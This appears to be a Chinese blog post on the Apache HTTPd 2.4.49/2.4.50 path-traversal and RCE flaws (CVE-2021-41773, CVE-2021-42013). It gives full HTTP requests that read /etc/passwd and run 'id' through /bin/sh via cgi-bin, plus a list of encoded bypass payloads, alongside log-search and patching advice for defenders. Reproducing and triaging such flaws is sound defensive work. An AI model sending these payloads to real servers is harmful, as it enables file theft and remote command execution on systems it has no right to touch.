Apache Httpd 路径穿越以及RCE漏洞排查

目录

概述

影响范围

环境搭建

漏洞复现

CVE-2021-41773

任意文件读取

命令执行

CVE-2021-42013

应急排查

修复建议


概述

2021年10月6日Apache HTTPd官方发布安全更新,披露了CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。在其2.4.49版本中,引入了一个路径穿越漏洞。在路径穿越目录允许被访问的的情况下,例如配置了 <Directory />Require all granted</Directory>,攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

影响范围

  • 版本等于 2.4.49和2.4.50
  • 穿越的目录允许被访问,比如配置 Require all granted(默认不允许)

环境搭建

git clone https://github.com/blasty/CVE-2021-41773

cd CVE-2021-41773

docker-compose build &amp;&amp; docker-compose up -d
#查看镜像对应端口
docker ps

 

漏洞复现

CVE-2021-41773

任意文件读取

访问界面抓包,直接打payloda即可(注:icons目录必须存在)

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx:8080
User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT
If-None-Match: "29cd-5ce49cca73d40-gzip"
Cache-Control: max-age=0

命令执行

访问界面抓包,修改请求包

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: xxx.xxx.xxx.xxx:8080
User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT
If-None-Match: "29cd-5ce49cca73d40-gzip"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id

CVE-2021-42013

该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行

此漏洞的Payload为:

/%2%65./
/%2%65%2e/
/.%2%65/
/%2e%2%65/  
/%2%65%2%65/
/%%32e%%32e/

 

应急排查

1、配置文件排查httpd.conf

查看apache-httpd版本号,是否为2.4.49和2.4.50,以及查看配置文件是否配置了“Require all granted”,cgi和cgid服务是否开启。

2、web访问日志排查

通过查询web网站访问日志,搜索“%2e”“.%65”“%%32e”等关键字,请求方式包括”GET“和”POST”

修复建议

建议使用Apache HTTPd 2.4.49 与Apache HTTPd 2.4.50 版本的服务器更新Apache HTTPd 版本至最新。

参考链接

https://www.cnblogs.com/L0ading/p/15406894.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值